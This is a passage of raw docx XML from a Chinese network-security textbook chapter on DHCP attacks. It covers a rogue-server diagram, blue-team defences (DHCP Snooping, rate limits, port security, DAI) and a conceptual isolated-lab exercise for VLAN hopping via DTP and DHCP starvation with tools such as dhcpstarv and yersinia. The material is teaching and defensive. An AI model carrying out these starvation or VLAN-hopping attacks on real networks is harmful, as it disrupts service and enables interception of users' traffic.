          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">B[交换机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">广播域]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">C[攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">伪造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --- B</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">D[合法客户端]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --- B</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> D -- DHCPDISCOVER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">广播</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; B</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> B -- DHCPOFFER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(合法)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; D</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> B -- DHCPOFFER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(恶意)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; D</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> D -- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接受先到达的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> OFFER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(常为攻击者)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻防双方在竞速，网络拓扑和响应时延决定了攻击成功率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="127"/>
    <w:bookmarkEnd w:id="128"/>
    <w:bookmarkStart w:id="129" w:name="dhcp-攻击防御对照框蓝队"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击防御对照框（蓝队）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的安全性必须由网络基础设施主动增强，不能依赖终端的“选对服务器”。核心防御技术是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DHCP Snooping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以及与其联动的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">端口限速</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">源防护（IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Source </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Guard）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DHCP Snooping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在交换机上启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后，交换机会将端口划分为信任（Trusted）和非信任（Untrusted）。只有信任端口才允许进入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器消息（OFFER、ACK），而非信任端口则仅允许发送客户端消息（DISCOVER、REQUEST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）。由此，伪造的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器即便接通网络，其发出的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OFFER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">也会被交换机直接在入端口丢弃。同时，DHCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会依据合法服务器的分配记录，自动构建一张</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP-MAC-端口-VLAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绑定数据库，为后续的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DAI（Dynamic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspection，动态</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测）提供事实依据【①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标准/通用原理：DHCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是防御伪造服务器和地址欺骗的基础机制】。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">报文限速</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在非信任端口上配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip dhcp snooping limit rate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，限制每秒允许的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文数量，防止饿死攻击消耗交换机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CPU </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和服务器地址池。该数值应设为远高于正常客户端的请求速率（通常个位数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pps），并设置违规动作（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">errdisable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">drop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）【②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境相关：具体阈值需结合网络规模调整】。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">端口安全与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">数量限制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Port Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">限制每个接入端口允许学习的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址数目，可以在一定程度上削弱饿死攻击中伪造海量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的能力——攻击者必须在同一端口上快速更换或模拟大量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址，端口安全一旦检测到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数量超过阈值即可关闭端口或告警。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DAI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">联动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绑定表的基础上，启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DAI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以拦截伪造的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">回复，防止攻击者通过伪造网关</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应答来实现中间人攻击。这是与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御密切关联的第二道防线，详细内容已在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗防御部分论及，此处仅强调其与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配合使用的重要性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">监控与告警</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">因限速被触发的违规事件、DHCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器响应比异常（例如短时间内出现多个不同服务器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OFFER）等进行日志审计和实时告警。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【靶机实操单元（概念演示）】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所讨论的攻击场景需要可配置的交换机操作系统（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cisco IOS、HPE Comware、Arista EOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）以及可自定义</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">客户端/服务器的主机。推荐读者使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GNS3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EVE-NG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">搭建包含至少两台交换机与多台虚拟主机的隔离实验环境。具体操作步骤依赖厂商命令，以下仅给出概念性实验指引（不提供可直接粘贴的完整配置脚本，以避免滥用）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">跳跃实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将交换机互联端口配置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DTP（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">switchport mode dynamic desirable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），将攻击者虚拟端口保持为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic auto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，观察攻击者在发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">帧后端口模式的变化（可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">show interfaces trunk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">确认）。在防止实验时，再禁用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DTP（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">switchport nonegotiate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）并重新观察。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">饿死实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在隔离广播域内运行合法的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ISC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DHCP），然后使用消耗工具（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dhcpstarv、yersinia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）从攻击主机发送大量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DISCOVER，监控合法服务器地址池状况（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dhcpd.leases</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> show </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令）。随后启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP Snooping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
